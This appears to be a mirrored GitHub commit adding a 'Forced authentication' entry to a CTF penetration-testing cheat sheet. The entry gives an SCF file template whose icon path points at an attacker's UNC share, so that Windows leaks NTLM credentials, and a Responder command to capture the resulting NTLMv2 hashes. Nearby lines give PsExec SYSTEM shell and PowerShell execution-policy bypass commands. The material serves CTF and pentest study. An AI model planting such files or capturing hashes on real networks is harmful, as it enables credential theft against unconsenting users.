Mirrors/CTF-Writeups
2
0
Fork 0
mirror of https://github.com/AbdullahRizwan101/CTF-Writeups synced 2024-11-10 06:34:17 +00:00
Code Issues Projects Releases Packages Wiki Activity

Update Cheat Sheet.md

Browse source
This commit is contained in:
ARZ 2021-10-04 02:38:11 +05:00 committed by GitHub
parent f82ee11f18
commit 4dfed10dec
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 17 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

18
Cheat Sheet.md
View file

@ -362,7 +362,23 @@ If the system has `PsExec.exe` open elevated cmd
`.\PsExec.exe -i -s cmd.exe`
### Active Directory
### Forced authentication (Stealing Hahses)
If we have access to upload files , we can upload SCF (Shell Command File) in which we can specify our IP and share so that when it makes a request to it , it's going to authenticate to our share with credentials
```
[Shell]
Command=2
IconFile=\\IP\share\test.ico
[Taskbar]
Command=ToggleDesktop
```
Then launch responder to capture the NTLMv2 hash
`responder -i tun0`
## Active Directory
`powershell -ep bypass` load a powershell shell with execution policy bypassed <br/>
`. .\PowerView.ps1` import the PowerView module